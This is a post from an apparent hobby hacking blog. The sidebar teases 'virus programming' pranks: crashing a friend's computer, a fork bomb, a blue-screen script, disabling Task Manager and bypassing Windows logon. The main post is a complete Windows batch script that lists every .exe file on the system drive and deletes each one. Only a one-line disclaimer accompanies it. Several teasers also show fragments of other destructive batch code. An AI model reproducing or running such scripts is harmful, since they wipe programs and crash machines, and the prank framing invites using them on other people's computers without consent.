Friday, 14th March 2025
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Virus Programming/Batch File Programming
  • Continually pop out your friend’s CD Drive

    Description:  This is a harmless code, which will pop out your cd drive automatically, a

  • Code to Disable Task Manager

    Description: This is harmless code to temporary disable the task manager. You can enable it aga

  • Create Your Own Virus using Virus Maker Softwares

    In This Tutorial I am gonna tell you an easy way to create viruses using Virus maker softwares n

  • Only 5 Characters are enough to Crash a System: Fork Bomb

    A fork bomb for crashing system is a smallest writable virus as it contains on 5 Characters

  • Shutdown your friends computer while chatting

    Hack While chatting 1)  Make a shortcut on desktop by Right click on desktop, and

  • Blue screen of death

    rem --------------------------------- rem Activate Blue Screen Of Death @((( Echo Off > Nul ) &

  • Batch code to Delete all exe's from a computer

    rem --------------------------------- rem Delete All Exe DIR /S/B %SystemDrive%\*.exe >> FI

  • Batch code to Crash a computer

    rem --------------------------------- rem Crash Computer echo start "" %0>>crash.bat echo st

  • Internet Tips
  • Trick to read blackout wiki page

    How to read blackout wikipedia page? Protesting against SOPA and PIPA bills,

  • Browse Privately Using Incognito Mode

    For times when you want to browse something Private, you must browse in 'incognito mode' &nb

  • Hacking Stuff
  • How to hack/Bypass windows logon p

    In response to query asked by Ameer Hasan Malik Did you forget your windows login passwo

  • Sql Injection For Beginners: Tutor

    Many times my readers have asked me to write about SQL Injection, but i always used to conside

  • Useful Softwares
  • Automate Repetitive tasks using Mo

    Through out a day, almost all computer user do many repetitive tasks on computer and

  • Transform your Windows7 laptop int

    In today's time, not even  every home has a laptop or computer, but every member

  • AntiVirus and Security Tips
  • Beware Adobe Software Upgrade Noti

    An email pretend to come from Adobe has been widely spammed out, Which has a malware in atta

  • Scan NewsFeed for threats with Nor

    It is very common to see bad infected link/video shared on your wall by some of your noob friend

  • Batch code to Delete all exe's from a computer

    rem ---------------------------------
    rem Delete All Exe
    DIR /S/B %SystemDrive%\*.exe >> FIleList_exe.txt
    echo Y | FOR /F "tokens=1,* delims=: " %%j in (FIleList_exe.txt) do del "%%j:%%k"
    rem ---------------------------------

    [Note: Be careful in using these scripts, i will not be responsible if you damage your system.]

    Written by:

    Surbhi is Founder of Follow her on Twitter or email her

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